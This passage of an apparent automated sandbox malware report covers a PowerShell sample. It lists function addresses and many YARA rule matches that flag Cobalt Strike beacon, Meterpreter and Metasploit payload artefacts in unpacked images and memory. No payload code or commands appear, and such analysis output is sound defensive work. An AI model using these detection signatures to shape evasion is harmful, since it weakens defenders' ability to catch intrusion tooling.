Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED301928	0_2_000001A6ED301928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED2E916C	0_2_000001A6ED2E916C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED332980	0_2_000001A6ED332980
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED2F0334	0_2_000001A6ED2F0334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30C397	0_2_000001A6ED30C397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30239C	0_2_000001A6ED30239C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED300374	0_2_000001A6ED300374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30E600	0_2_000001A6ED30E600
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED2ECE3C	0_2_000001A6ED2ECE3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30C680	0_2_000001A6ED30C680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED2E9680	0_2_000001A6ED2E9680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED2FF5A8	0_2_000001A6ED2FF5A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30CFF0	0_2_000001A6ED30CFF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED2F6F38	0_2_000001A6ED2F6F38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30B7B0	0_2_000001A6ED30B7B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED35F200	0_2_000001A6ED35F200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED33DA3C	0_2_000001A6ED33DA3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED33A280	0_2_000001A6ED33A280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED35D280	0_2_000001A6ED35D280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED3501A8	0_2_000001A6ED3501A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED35DBF0	0_2_000001A6ED35DBF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED347B38	0_2_000001A6ED347B38
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED35C3B0	0_2_000001A6ED35C3B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED351E64	0_2_000001A6ED351E64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34867C	0_2_000001A6ED34867C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED35B6B0	0_2_000001A6ED35B6B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED356514	0_2_000001A6ED356514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED352528	0_2_000001A6ED352528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED339D6C	0_2_000001A6ED339D6C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED340F34	0_2_000001A6ED340F34
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED352F9C	0_2_000001A6ED352F9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED35CF97	0_2_000001A6ED35CF97
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED350F74	0_2_000001A6ED350F74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD347983D5	0_2_00007FFD347983D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD347944FB	0_2_00007FFD347944FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3479A475	0_2_00007FFD3479A475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34796CCD	0_2_00007FFD34796CCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD347926F5	0_2_00007FFD347926F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3479AEFA	0_2_00007FFD3479AEFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34792EFA	0_2_00007FFD34792EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34795EFA	0_2_00007FFD34795EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34797FF2	0_2_00007FFD34797FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34794322	0_2_00007FFD34794322
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34866B92	0_2_00007FFD34866B92

Source: oEFrY6Xcyl.ps1, type: SAMPLE	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: amsi64_2820.amsi.csv, type: OTHER	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
